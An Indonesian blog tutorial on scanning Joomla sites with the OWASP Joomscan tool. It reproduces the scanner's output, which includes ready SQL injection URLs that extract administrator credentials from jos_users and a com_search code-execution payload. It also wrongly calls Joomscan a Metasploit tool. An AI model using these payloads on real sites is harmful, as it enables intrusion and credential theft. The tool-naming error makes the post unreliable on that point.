Friday, November 23, 2012

Mencari Kelemahan Joomla dengan Joomscan

Yah, inilah saatnya setelah lama vacum untuk mengisi blog karena banyak tugas kuliah, nah sekarang coba update satu posting saja. Soalnya masih banyak tugas kuliah yang belum saya selesaikan .. hhehehee

Nah diposting kali ini saya akan membahas sedikit tentang tools metasploit yang ada dibacktrack. Disini saya menggunakan BT5R2 (Backtrack 5 Release 2). Nah tools yang saya gunakan adalah Joomscan. Sesuai judul yang diatas yaitu mengetahui kelemahan websiti joomla dengan menggunakan Joomscan.

Nah sebelum kepermasalah inti baiknya anda tau apa itu joomscan. Nah menurut saya Joomscan adalah salah satu tools metasploit yang digunakan untuk memeriksa atau menscan kelemahan/bugs//vurnerability dari suatu website yang berbasis CMS(Component Management System) Joomla. Nah itu sekilas Pengertian dari saya mengenai joomscan. Untuk lebih jelasnya silakan mencari referensi lain tentang Joomscan ini. CMIIW



Oke sampe kepermasalah utama .. Bagaimana cara memeriksa kelemahan dari website joomla yang anda buat. Nah Langkah pertama masuk ke menu :

Backtrack --> Vurnerability Assessment --> Web Application Assessment --> CMS Vurnerability Identification --> Joomscan

Nah setelah itu maka akan muncul terminal dengan script seperti berikut :


 ..|''||   '|| '||'  '|'     |      .|'''.|  '||''|.
.|'    ||   '|. '|.  .'     |||     ||..  '   ||   ||
||      ||   ||  ||  |     |  ||     ''|||.   ||...|'
'|.     ||    ||| |||     .''''|.  .     '||  ||    
 ''|...|'      |   |     .|.  .||. |'....|'  .||.   
  

=================================================================
 OWASP Joomla! Vulnerability Scanner v0.0.4
 (c) Aung Khant, aungkhant]at[yehg.net
 YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab
 Update by: Web-Center, http://web-center.si (2011)
=================================================================

 Vulnerability Entries: 611
 Last update: February 2, 2012

 Usage:  ./joomscan.pl -u <string> -x proxy:port
         -u <string>      = joomla Url

         ==Optional==

         -x <string:int>  = proXy to tunnel
         -c <string>      = Cookie (name=value;)
         -g "<string>"    = desired useraGent string(within ")
         -nv              = No Version fingerprinting check
         -nf              = No Firewall detection check
         -nvf/-nfv        = No version+firewall check
         -pe           = Poke version only and Exit
         -ot              = Output to Text file (target-joexploit.txt)
         -oh              = Output to Html file (target-joexploit.htm)
         -vu              = Verbose (output every Url scan)
     -sp          = Show completed Percentage
       
 ~Press ENTER key to continue


 Example:  ./joomscan.pl -u victim.com -x localhost:8080
    
 Check:    ./joomscan.pl check
           - Check if the scanner update is available or not.

 Update:   ./joomscan.pl update
           - Check and update the local database if newer version is available.

 Download: ./joomscan.pl download
           - Download the scanner latest version as a single zip file - joomscan-latest.zip.

 Defense:  ./joomscan.pl defense
           - Give a defensive note.

 About:    ./joomscan.pl story
           - A short story about joomscan.

 Read:     ./joomscan.pl read DOCFILE
           DOCFILE - changelog,release_note,readme,credits,faq,owasp_project
  
nah sekarang tinggal tulis aja website anda yang ingin anda cek kelemahannya , sepeti berikut :
./joomscan.pl -u yoursite.com

Nah setelah itu silakan tunggu beberapa menit kemudian maka akan muncul hasil scan2 seperti berikut :
 ..|''||   '|| '||'  '|'     |      .|'''.|  '||''|. 
.|'    ||   '|. '|.  .'     |||     ||..  '   ||   ||
||      ||   ||  ||  |     |  ||     ''|||.   ||...|'
'|.     ||    ||| |||     .''''|.  .     '||  ||     
 ''|...|'      |   |     .|.  .||. |'....|'  .||.    
   

=================================================================
OWASP Joomla! Vulnerability Scanner v0.0.4 
(c) Aung Khant, aungkhant]at[yehg.net
YGN Ethical Hacker Group, Myanmar, http://yehg.net/lab
Update by: Web-Center, http://web-center.si (2011)
=================================================================


Vulnerability Entries: 611
Last update: February 2, 2012

Use "update" option to update the database
Use "check" option to check the scanner update
Use "download" option to download the scanner latest version package
Use svn co to update the scanner and the database
svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan


Server: rh
X-Powered-By: PHP/5.2.17


## Checking if the target has deployed an Anti-Scanner measure

[!] Scanning Passed ..... OK


## Detecting Joomla! based Firewall ...

[!] No known firewall detected!


## Fingerprinting in progress ...

~Unable to detect the version. Is it sure a Joomla?

## Fingerprinting done.




Vulnerabilities Discovered
==========================

# 1
Info -> Generic: htaccess.txt has not been renamed.
Versions Affected: Any
Check: /htaccess.txt
Exploit: Generic defenses implemented in .htaccess are not available, so exploiting is more likely to succeed.
Vulnerable? Yes

# 2
Info -> Generic: Unprotected Administrator directory
Versions Affected: Any
Check: /administrator/
Exploit: The default /administrator directory is detected. Attackers can bruteforce administrator accounts. Read: http://yehg.net/lab/pr0js/view.php/MULTIPLE%20TRICKY%20WAYS%20TO%20PROTECT.pdf
Vulnerable? Yes

# 3
Info -> Core: Multiple XSS/CSRF Vulnerability
Versions Affected: 1.5.9 <=
Check: /?1.5.9-x
Exploit: A series of XSS and CSRF faults exist in the administrator application.  Affected administrator components include com_admin, com_media, com_search.  Both com_admin and com_search contain XSS vulnerabilities, and com_media contains 2 CSRF vulnerabilities. 
Vulnerable? N/A

# 4
Info -> Core: JSession SSL Session Disclosure Vulnerability
Versions effected: Joomla! 1.5.8 <=
Check: /?1.5.8-x
Exploit: When running a site under SSL (the entire site is forced to be under ssl), Joomla! does not set the SSL flag on the cookie.  This can allow someone monitoring the network to find the cookie related to the session.
Vulnerable? N/A

# 5
Info -> Core: Frontend XSS Vulnerability
Versions effected: 1.5.10 <=
Check: /?1.5.10-x
Exploit: Some values were output from the database without being properly escaped.  Most strings in question were sourced from the administrator panel. Malicious normal admin can leverage it to gain access to super admin.
Vulnerable? N/A

# 6
Info -> Core: Frontend XSS - HTTP_REFERER not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-http_ref
Exploit: An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing the attacker to steal cookies. HTTP_REFERER variable is not properly parsed.
Vulnerable? N/A

# 7
Info -> Core: Frontend XSS - PHP_SELF not properly filtered Vulnerability
Versions effected: 1.5.11 <=
Check: /?1.5.11-x-php-s3lf
Exploit: An attacker can inject JavaScript code in a URL that will be executed in the context of targeted user browser.
Vulnerable? N/A

# 8
Info -> Core: Authentication Bypass Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /administrator/
Exploit: Backend accepts any password for custom Super Administrator when LDAP enabled
Vulnerable? N/A

# 9
Info -> Core: Path Disclosure Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-path-disclose
Exploit: Crafted URL can disclose absolute path
Vulnerable? N/A

# 10
Info -> Core: User redirected Spamming Vulnerability
Versions effected: Joomla! 1.5.3 <=
Check: /?1.5.3-spam
Exploit: User redirect spam
Vulnerable? N/A

# 11
Info -> Core: Admin Backend Cross Site Request Forgery Vulnerability
Versions effected: 1.0.13 <=
Check: /administrator/
Exploit: It requires an administrator to be logged in and to be tricked into a specially crafted webpage.
Vulnerable? N/A

# 12
Info -> CoreComponent: com_content SQL Injection Vulnerability
Version Affected: Joomla! 1.0.0 <=
Check: /components/com_content/
Exploit: /index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Vulnerable? No

# 13
Info -> CoreComponent: com_search Remote Code Execution Vulnerability
Version Affected: Joomla! 1.5.0 beta 2 <=
Check: /components/com_search/
Exploit: /index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B
Vulnerable? No

# 14
Info -> CoreComponent: MailTo SQL Injection Vulnerability
Versions effected: N/A
Check: /components/com_mailto/
Exploit: /index.php?option=com_mailto&tmpl=mailto&article=550513+and+1=2+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Vulnerable? No

# 15
Info -> CoreComponent: com_content Blind SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 RC3
Check: /components/com_content/
Exploit: /index.php?option=com_content&view=%' +'a'='a&id=25&Itemid=28
Vulnerable? No

# 16
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_content/
Exploit: The defaults on com_content article submission allow entry of dangerous HTML tags (script, etc).  This only affects users with access level Author or higher, and only if you have not set filtering options in com_content configuration.
Vulnerable? N/A

# 17
Info -> CoreComponent: com_weblinks XSS Vulnerability
Version Affected: Joomla! 1.5.7 <=
Check: /components/com_weblinks/
Exploit: [Requires valid user account] com_weblinks allows raw HTML into the title and description tags for weblink submissions (from both the administrator and site submission forms).
Vulnerable? N/A

# 18
Info -> CoreComponent: com_mailto Email Spam Vulnerability
Version Affected: Joomla! 1.5.6 <=
Check: /components/com_mailto/
Exploit: The mailto component does not verify validity of the URL prior to sending.
Vulnerable? N/A

# 19
Info -> CoreComponent: com_content view=archive SQL Injection Vulnerability
Versions effected: Joomla! 1.5.0 Beta1/Beta2/RC1
Check: /components/com_content/
Exploit: Unfiltered POST vars - filter, month, year  to /index.php?option=com_content&view=archive
Vulnerable? No

# 20
Info -> CoreComponent: com_content XSS Vulnerability
Version Affected: Joomla! 1.5.9 <=
Check: /components/com_content/
Exploit: A XSS vulnerability exists in the category view of com_content.
Vulnerable? N/A

# 21
Info -> CoreComponent: com_users XSS Vulnerability
Version Affected: Joomla! 1.5.10 <=
Check: /components/com_users/
Exploit: A XSS vulnerability exists in the user view of com_users in the administrator panel.
Vulnerable? N/A

Nah jika vurnerablenya bernilai Yes .. maka disitunya terdapat celah yang terbuka ,, hehehehe setidaknya itu yang baru saya tahu dari Joomscan ,. nah nanti kita sambung lagi bagaimana cara hackingnya ,, hehehehe


*Tutorial ini hanya untuk kepentingan Pribadi. Jika disalahgunakan oleh pembaca bukan tanggung Jawab Penulis ,

CMIIW



ino_ot

2 komentar:

  1. Mantap gan. (y)
    nice post. ane pingin belajar gan.
    ajarin ane donk gan :)

    ReplyDelete

NgomeL aja disini..!!